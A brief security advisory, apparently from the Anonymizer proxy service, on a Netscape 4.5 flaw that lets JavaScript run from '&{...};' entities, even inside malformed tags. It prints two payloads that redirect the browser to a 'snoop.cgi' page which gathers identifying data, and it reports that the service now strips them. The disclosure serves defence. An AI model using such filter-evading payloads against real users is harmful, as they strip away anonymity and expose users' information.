Anonymizer Security Issue

We have been alerted to the existence of a Netscape JavaScript security issue affecting Anonymizer.

Netscape 4.5 (and possibly earlier versions) allow JavaScript code to be embedded inside HTML if the code is delimited with '&{' and '};'. Although this has the potential to be a useful and versatile feature, and was apparently intended as such, it is implemented so broadly that it has the potential for widespread misuse.

We now disable all JavaScript embedded in this way, even if it is not within valid or standard HTML tags.

A simple example is the following:

<A HREF="&{location.href='https://www.anonymizerproxy.com/3.0/snoop.cgi'};">
click here!</A>

In Netscape a page containing this code will briefly load and display "click here!" but will then immediately load the URL between the single quotes. In other browsers, the "click here!" would be displayed followed by a "File Not Found" when the link was selected.

In this case, the page to which the user is redirected retrieves information about the users domain and other data that could compromise the users anonymity. A differently designed page could obtain additional information surreptitiously.

A further problem is that this embedded JavaScript will apparently execute even if the HTML tag is not valid. The JavaScript code can be embedded in any string beginning with a "<" followed by any alphabetic character and terminated with a ">". Thus, the following will also execute the above JavaScript:

<x&{location.href='https://www.anonymizerproxy.com/3.0/snoop.cgi'};>

nothing displays in the location of this tag before redirection occurs.

Thank-you.